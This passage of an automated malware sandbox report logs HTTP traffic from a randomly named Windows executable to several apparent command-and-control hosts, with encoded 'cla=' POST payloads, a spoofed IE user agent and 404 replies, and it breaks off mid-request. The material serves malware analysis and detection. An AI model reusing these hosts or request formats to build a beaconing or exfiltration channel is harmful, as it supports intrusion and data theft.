                                                                                                            Data Ascii: cla=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9+bhpWljTA+lv5bJnq/wWwI+rleOqLNVcCe3zVNOWu3ku1ct2keD/LTfWc+jHWKBVSoFs/V4bOQziw4wyhtvABQLtYqN5ZXw+K00Gyv2lhhjhANwd4zL1PKI9aZ4M50aZEzVpk9Cmbr8E35iZ0PrvS41Vl1YHIkViNwRM5D6i0q5Gl1G8xizEbd1O83UpBG85NzdUdZHCO6dXwR5q6LtWrxgEVvC+g76KWh0PXPXE27DOQtGb+5P6UgBAyV3bnVnuxxb7UKZbHct2lBeIqnfTGhBB2TMFJ/8GAwS3vAwkQCtFxJOs54cu66bGjyC8TyLkP4ttWPJ9FlhlJ/5RK8krKz8NmRY2zE3RXpN94Nzs6lPeLCwNYjTY2JAqSbFNtIr5QxY8sQy9RPpy74LQ3rmBP9V60W2T/evRnxiQ8V9hBM/roR/X5rsHr930awgAeLCXZraBwBecyBTnOfNEPsQJtYoVwrSNzMlfRuyRkthhmYRb0sXyvKUcHeJ4UA4TZwDKotLfl+3svBkpg1lEWEskeAJMxDCm0YX3ibdERYql93DHCq7iiVhcVgiss3yxZx5hToERUXtKGtE6hY1AEpjgCpNrd3iaIBxlVU05HmsevEQsVjvjTSToUX8I/XiEIv1T1h1mkaLLd/H0nYjH1HYatH00VlNGdRE0qpx7oZ4UondZggqYkK4ylhZ/k+nIb+kMUPlfMrieAknYduq1ZPEzFl9siHbu3fr4Zja7KWhMm7cFwTkqLLyk9pQMldqbQwR9VcvzlzxIM3fLiZ4M1d/MhqzD7e/R+grBOvwUOBwWttjhZA4RHZRmpfjv/s/73yC183tf7mkQGI1STSzK80sXPcLZ/2x71uRTeTZQayvBpcVwGQvIXJIM7C1TewWLxrKQwVZQFx0NjwHJmSw3D/VWAITGJDbSZ9uV [TRUNCATED]
                                                                                                            Nov 22, 2024 07:57:24.179091930 CET816INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:24 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cmUnu1IYDT74XUTHcoWoBgyN84S8VRCRHcyYhcPamaHDBHswDwex9jk5nYOuEadz5iefBNT8nKypGXeLQq%2F6iiRcw2PH0my%2FjhlaQFekEbFfF3dDwq8otLiYuC03r30nzlvSOENQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67066c9e4d440d-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1530&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1653&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                            Data Ascii: f
                                                                                                            Nov 22, 2024 07:57:24.179580927 CET692INData Raw: 32 61 38 0d 0a 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 92 21 b5 d3 11 ba ad fe 01 6d 92 b2 42 92 96 2d 65 94 31 8a 2c 9d 63 15 45 f2 24 25 21 4b fc bf 0f db 69 9a 15 da b1 0f 06 49 f7 de bd bb d3 b3 a2 a3 c1 6d 7f fa 70 37 44 5f a6 e3 11 ba bb bf
                                                                                                            Data Ascii: 2a8Tk0B!mB-e1,cE$%!KiImp7D_Q4n LMe@yp^&kP<V(|]L~"ZuZQv(pH+raGAQ.9NhE\wEcbzhP34ZX@TahryN


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.550009172.67.209.48802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:25.676951885 CET354OUTGET /huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:57:26.873251915 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:26 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brVa9GSdK4llpNGUeu5AxwXCeBEXy57MyT5MYTdg4oDXKzqXACGcz9QaGPFFSjhCOKj74tQoI0VOafq7vLVUDvFt5AU9Vs1D3U%2BVn0bL6g%2BooW1uuRSVXLg6PQv1VdYj6hA5UVJRow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67067d8fa6422e-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=354&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b [TRUNCATED]
                                                                                                            Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'
                                                                                                            Nov 22, 2024 07:57:26.873310089 CET800INData Raw: 38 65 36 37 30 36 37 64 38 66 61 36 34 32 32 65 27 2c 74 3a 27 4d 54 63 7a 4d 6a 49 31 4f 44 59 30 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69
                                                                                                            Data Ascii: 8e67067d8fa6422e',t:'MTczMjI1ODY0Ni4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.550010209.74.77.109802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:32.527621984 CET613OUTPOST /6gtt/ HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.gogawithme.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.gogawithme.live/6gtt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 66 45 6f 55 73 33 78 62 74 43 48 52 50 62 42 64 6a 61 53 4a 71 34 69 54 73 52 72 7a 50 2f 66 6b 4c 5a 75 73 58 75 6e 2b 56 6d 72 76 32 4c 58 6f 66 47 79 46 59 2b 65 69 73 53 4a 39 37 65 5a 51 32 61 75 6f 55 62 79 63 6c 4f 36 41 46 75 4d 6a 38 6f 72 76 64 39 44 56 59 69 33 64 76 64 56 35 45 6e 6a 76 2f 6e 72 6d 4b 58 61 64 41 50 4e 4a 31 6b 34 4c 37 36 47 4a 30 6d 52 4e 52 42 30 39 66 62 54 53 48 4e 55 2f 67 44 64 57 68 76 58 79 6f 41 31 45 5a 71 4b 6a 38 56 36 42 6f 73 44 55 57 68 66 6a 35 31 55 48 54 54 57 73 39 59 66 35 51 6a 74 32 32 32 63 6f 68 56 47 77 31 57 47 61 36 62 7a 6b 53 57 30 3d
                                                                                                            Data Ascii: cla=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUWhfj51UHTTWs9Yf5Qjt222cohVGw1WGa6bzkSW0=
                                                                                                            Nov 22, 2024 07:57:33.739012003 CET533INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:33 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.550011209.74.77.109802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:35.197118044 CET633OUTPOST /6gtt/ HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.gogawithme.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.gogawithme.live/6gtt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 41 54 76 33 75 37 6f 65 46 71 46 66 2b 65 69 6e 79 4a 38 31 2b 5a 68 32 61 6a 43 55 61 4f 63 6c 50 61 41 46 75 63 6a 2f 62 44 73 50 64 44 58 54 43 33 54 79 4e 56 35 45 6e 6a 76 2f 6e 4f 37 4b 58 43 64 41 66 39 4a 76 41 4d 49 32 61 47 4b 38 47 52 4e 56 42 30 35 66 62 54 38 48 4f 51 56 67 47 42 57 68 73 44 79 6f 52 31 44 51 71 4b 6c 68 46 37 4f 75 63 32 4d 5a 41 76 31 31 6e 52 6d 4e 54 57 73 34 75 75 54 4b 42 6c 65 6c 57 77 51 78 47 4f 48 6b 6d 6e 7a 67 34 6a 55 4d 42 68 62 2b 67 6b 59 75 31 6c 63 54 69 42 72 47 76 73 74 7a 54 41 54
                                                                                                            Data Ascii: cla=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelWwQxGOHkmnzg4jUMBhb+gkYu1lcTiBrGvstzTAT
                                                                                                            Nov 22, 2024 07:57:36.404454947 CET533INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:36 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.550012209.74.77.109802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:37.855245113 CET1650OUTPOST /6gtt/ HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.gogawithme.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.gogawithme.live/6gtt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75 33 73 57 74 44 58 63 69 33 53 76 64 56 57 45 6b 4c 72 2f 6e 65 37 4b 58 43 64 41 5a 78 4a 68 45 34 49 6c 71 47 4a 30 6d 52 2f 52 42 30 42 66 59 69 42 48 4e 38 76 6a 31 5a 57 68 4d 54 79 72 6a 74 44 66 71 4b 6e 79 31 36 52 75 63 71 74 5a 41 7a 35 31 6d 6c 41 4e 52 57 73 34 66 53 4f 52 77 6b 43 35 56 67 4a 32 48 4f 4d 34 78 48 71 75 35 53 37 49 57 64 61 79 31 63 4f 73 6c 4e 47 52 44 6f 37 64 65 78 36 6a 48 31 72 33 65 68 36 49 36 4d 2b 48 75 2f 66 70 57 62 4e 57 77 45 6a 31 68 46 51 63 68 6c 58 47 2f 79 45 53 30 76 4c 45 37 73 4d 34 6e 67 47 2f 6a 37 41 7a 33 4d 61 65 6e 59 78 71 7a 79 5a 41 6d 51 30 7a 49 4c 4d 44 46 4b 57 6f 6b 47 67 42 77 72 75 45 65 5a 5a 64 2f 56 69 46 37 54 61 41 51 47 72 59 50 65 52 31 53 72 68 53 39 33 79 74 65 34 67 67 6c [TRUNCATED]
                                                                                                            Data Ascii: cla=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRWs4fSORwkC5VgJ2HOM4xHqu5S7IWday1cOslNGRDo7dex6jH1r3eh6I6M+Hu/fpWbNWwEj1hFQchlXG/yES0vLE7sM4ngG/j7Az3MaenYxqzyZAmQ0zILMDFKWokGgBwruEeZZd/ViF7TaAQGrYPeR1SrhS93yte4ggl0ry8s60ngHQm7KTU2X4RSSGcimiZ8VHwfPZx0uJD9iu0nRhaX686xPiNL/9q42GHrp184LylIgb7cJL30i/cKEk5N9LfvX3uATQPXfQDpgXi5n3/NzYnxvAOVp4Zx+1ZUjDnKOxyN62PCjgL44nSFdSzG+1RbyJCi7hj0NwvmJdxTfbf89CJ2PB8n6XhxJ5z+KwqpzISVE4NfiLo2EXunuwCP/gH62IHACfSPPpZ6pKn2XDVEX5vkpv68N0XlS31UPwMTidmTeTMWwF0rtl+eIlIETAms3rmEduB/VnEt9JbQNZ+uD0XJ4cDEmlgcrftl2q9bxXQkuSx2y53xzQq550zL2mwF9GFAAoXkjeaJNvmUVZF4TI5YNDJSXI8WXB13TsU6nHZB1S89misI/D4ytutIuXiQvEjloviTo0aGXosKC9gsBVoVWkGo30UWHS3e6ge6dVmvINtc3iMdT6MzpxmQUYXCIFwqxDzNsU22mndPbfABLscbY20h/eNydP1JEHhM7/3Vb9H9oPnPISnjVWaA0QN5vix/8B2xQJkb4Sv0l5b0HGIj4Ql53QSEeRWb7iFC6Y0297aHXEZSqMRyJtfhGXx4TNk36z3Xvk3zmxmGjHNNNckMEUNxqzrkiexZ/RdOcBmfH6rUuASN7aGw4N0cAW6JmmtVI [TRUNCATED]
                                                                                                            Nov 22, 2024 07:57:38.106501102 CET1236OUTData Raw: 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75
                                                                                                            Data Ascii: fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRWs4fSORwkC5VgJ2HOM4xHqu5S7IWday1cOslNGRDo7dex6jH1r3eh6I6M+Hu/fpWbNWwEj1hF
                                                                                                            Nov 22, 2024 07:57:39.107515097 CET533INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:38 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.550013209.74.77.109802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:40.504962921 CET353OUTGET /6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:57:41.774331093 CET548INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:41 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.550014161.97.142.144802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:47.521241903 CET604OUTPOST /jm2l/ HTTP/1.1
                                                                                                            Host: www.54248711.xyz
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
